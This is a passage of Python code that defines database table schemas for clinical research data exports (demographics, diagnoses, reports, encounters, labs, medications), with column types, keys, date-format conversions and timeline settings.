        # EMPI is the primary key here: one contact record per patient.
        [TableColumn(name="EMPI", **{**_CON_COLUMN_DEFAULTS,
                                     "primaryKey": True, "unique": True, "notNull": True})]
        + [TableColumn(name=column_name, **_CON_COLUMN_DEFAULTS) for column_name in (
            "MRN_Type",
            "MRN",
            "Last_Name",
            "First_Name",
            "Middle_Name",
            "Address1",
            "Address2",
            "City",
            "State",
            "Zip",
            "Country",
            "Home_Phone",
            "Day_Phone",
            "SSN",
            "VIP",
            "Previous_Name",
            "Patient_ID_List",
            "Insurance_1",
            "Insurance_2",
            "Insurance_3",
            "Primary_Care_Physician",
            "Resident_Primary_Care_Physician",
        )]
    ),
)
#--------------------------------------------------------------------------------------------
# Dem RPDR table: patient demographics, one row per patient keyed by EMPI.
# Not shown on the timeline (useInTimeline=False); no free-text report column.
Dem = Table(
    name = 'Dem',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = False,
    columns = [
        # EMPI is the primary key here: unique and NOT NULL.
        TableColumn(name="EMPI", type="TEXT", primaryKey=True, index=False, unique=True, notNull=True, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Gender", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        # Dates arrive as US-style MM/DD/YYYY and are rewritten to the SQLite date format.
        TableColumn(name="Date_of_Birth", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="Age", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Language", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Race", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Marital_status", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Religion", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Is_a_veteran", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Zip_code", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Country", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Vital_status", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Date_Of_Death", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT)),
    ]
)
#--------------------------------------------------------------------------------------------
# Dia RPDR table: coded diagnoses. Timeline-enabled: "Date" is the event date and
# "Diagnosis_Name" supplies the timeline blurb text.
Dia = Table(
    name = 'Dia',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        # EMPI is indexed (not a primary key — many diagnosis rows per patient) and NOT NULL.
        TableColumn(name="EMPI", type="TEXT", primaryKey=False, index=True, unique=False, notNull=True, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        # MM/DD/YYYY source dates are normalized to the SQLite date format.
        TableColumn(name="Date", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=True, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="Diagnosis_Name", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=True, dateReformat=None),
        TableColumn(name="Code_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Code", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_Flag", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Provider", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Clinic", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Hospital", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Inpatient_Outpatient", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Encounter_number", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
    ]
)
#--------------------------------------------------------------------------------------------
# Dis RPDR table: discharge reports. The last column (Report_Text) holds the free-text
# report body; Report_Date_Time is the timeline date and Report_Description the blurb.
Dis = Table(
    name = 'Dis',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = True,
    useInTimeline = True,
    columns = [
        # EMPI: indexed, NOT NULL — many report rows per patient.
        TableColumn(name="EMPI", type="TEXT", primaryKey=False, index=True, unique=False, notNull=True, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Report_Number", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MID", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        # Source timestamps are 12-hour US format with AM/PM; converted to SQLite date format.
        TableColumn(name="Report_Date_Time", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=True, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="Report_Description", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=True, dateReformat=None),
        TableColumn(name="Report_Status", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Report_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Report_Text", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
    ]
)
#--------------------------------------------------------------------------------------------
# Dpt RPDR table: same report-style layout as Dis — free-text report in the last column,
# Report_Date_Time drives the timeline, Report_Description is the blurb.
Dpt = Table(
    name = 'Dpt',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = True,
    useInTimeline = True,
    columns = [
        # EMPI: indexed, NOT NULL.
        TableColumn(name="EMPI", type="TEXT", primaryKey=False, index=True, unique=False, notNull=True, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Report_Number", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MID", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        # 12-hour timestamp with AM/PM, normalized to the SQLite date format.
        TableColumn(name="Report_Date_Time", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=True, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="Report_Description", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=True, dateReformat=None),
        TableColumn(name="Report_Status", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Report_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Report_Text", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
    ]
)
#--------------------------------------------------------------------------------------------
# Enc RPDR table: encounters/admissions. Admit_Date is the timeline date and Clinic_Name
# the blurb; Discharge_Date is reformatted but not used as the timeline date.
Enc = Table(
    name = 'Enc',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        # EMPI: indexed, NOT NULL.
        TableColumn(name="EMPI", type="TEXT", primaryKey=False, index=True, unique=False, notNull=True, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Encounter_number", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Encounter_Status", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Hospital", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Inpatient_Outpatient", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Service_Line", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Attending_MD", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Admit_Date", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=True, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="Discharge_Date", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="Clinic_Name", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=True, dateReformat=None),
        TableColumn(name="Admit_Source", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Discharge_Disposition", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Payor", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Admitting_Diagnosis", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        # NOTE(review): "Principle_Diagnosis" is presumably the spelling used in the RPDR
        # source-file header ("Principal" is the conventional term) — must stay as-is to match.
        TableColumn(name="Principle_Diagnosis", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_1", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_2", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_3", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_4", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_5", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_6", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_7", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_8", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_9", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Diagnosis_10", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="DRG", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Patient_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Referrer_Discipline", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
    ]
)
#--------------------------------------------------------------------------------------------
# End RPDR table: report-style layout identical to Dis/Dpt — free-text report in the last
# column, Report_Date_Time as timeline date, Report_Description as the blurb.
End = Table(
    name = 'End',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = True,
    useInTimeline = True,
    columns = [
        # EMPI: indexed, NOT NULL.
        TableColumn(name="EMPI", type="TEXT", primaryKey=False, index=True, unique=False, notNull=True, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Report_Number", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MID", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        # 12-hour timestamp with AM/PM, normalized to the SQLite date format.
        TableColumn(name="Report_Date_Time", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=True, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="Report_Description", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=True, dateReformat=None),
        TableColumn(name="Report_Status", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Report_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Report_Text", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
    ]
)
#--------------------------------------------------------------------------------------------
# Lab RPDR table: laboratory results. Seq_Date_Time is the timeline date and
# Test_Description the blurb; no free-text report column.
Lab = Table(
    name = 'Lab',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        # EMPI: indexed, NOT NULL.
        TableColumn(name="EMPI", type="TEXT", primaryKey=False, index=True, unique=False, notNull=True, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        # 24-hour timestamp (no seconds) normalized to the SQLite date format.
        TableColumn(name="Seq_Date_Time", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=True, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="Group_Id", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Loinc_Code", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Test_Id", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Test_Description", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=True, dateReformat=None),
        TableColumn(name="Result", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Result_Text", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Abnormal_Flag", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Reference_Units", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Reference_Range", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Toxic_Range", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Specimen_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Specimen_Text", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Correction_Flag", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Test_Status", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Ordering_Doc_Name", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Accession", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Source", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
    ]
)
#--------------------------------------------------------------------------------------------
# Lhm RPDR table: LMR health-maintenance entries. The Date_Time column is the timeline
# date and LMR_Text_Name the blurb; no free-text report column.
Lhm = Table(
    name = 'Lhm',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        # EMPI: indexed, NOT NULL.
        TableColumn(name="EMPI", type="TEXT", primaryKey=False, index=True, unique=False, notNull=True, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="System", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        # 24-hour timestamp (no seconds) normalized to the SQLite date format.
        TableColumn(name="LMR_Health_Maintenance_Date_Time", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=True, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="LMR_Text_Name", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=True, dateReformat=None),
        TableColumn(name="Code", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="LMR_Code_Name", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Result", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Result_Text", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Comments", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
    ]
)
#--------------------------------------------------------------------------------------------
# Lme RPDR table: LMR medications. LMR_Medication_Date_Time drives the timeline and
# LMR_Text_Med_Name is the blurb; no free-text report column.
Lme = Table(
    name = 'Lme',
    fileExt = 'txt',
    csvDialect = StandardCsvDialect,
    freeTextReportInLastColumn = False,
    useInTimeline = True,
    columns = [
        # EMPI: indexed, NOT NULL.
        TableColumn(name="EMPI", type="TEXT", primaryKey=False, index=True, unique=False, notNull=True, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN_Type", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="MRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        # 24-hour timestamp (no seconds) normalized to the SQLite date format.
        TableColumn(name="LMR_Medication_Date_Time", type="DATETIME", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=True, timelineBlurb=False, dateReformat=DateReformat(format='%m/%d/%Y %H:%M', reformat=SQLITE_DATE_FORMAT)),
        TableColumn(name="LMR_Text_Med_Name", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=True, dateReformat=None),
        TableColumn(name="Generic_ID", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Rollup_ID", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="LMR_Code_Med_Name", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Med_ID", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Med_Freq", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Med_Route", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Dose", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Units", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Take_Dose", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Take_Units", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Dispense", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Dispense_Units", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Duration", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Duration_Units", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Refills", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="PRN", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Rx", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="No_Substitutions", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Directions", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
        TableColumn(name="Comments", type="TEXT", primaryKey=False, index=False, unique=False, notNull=False, foreignKeyRef=None, timelineDate=False, timelineBlurb=False, dateReformat=None),
    ]
)
#--------------------------------------------------------------------------------------------
# define Lno RPDR table
# Lno is built table-driven: one spec tuple per column, expanded through a
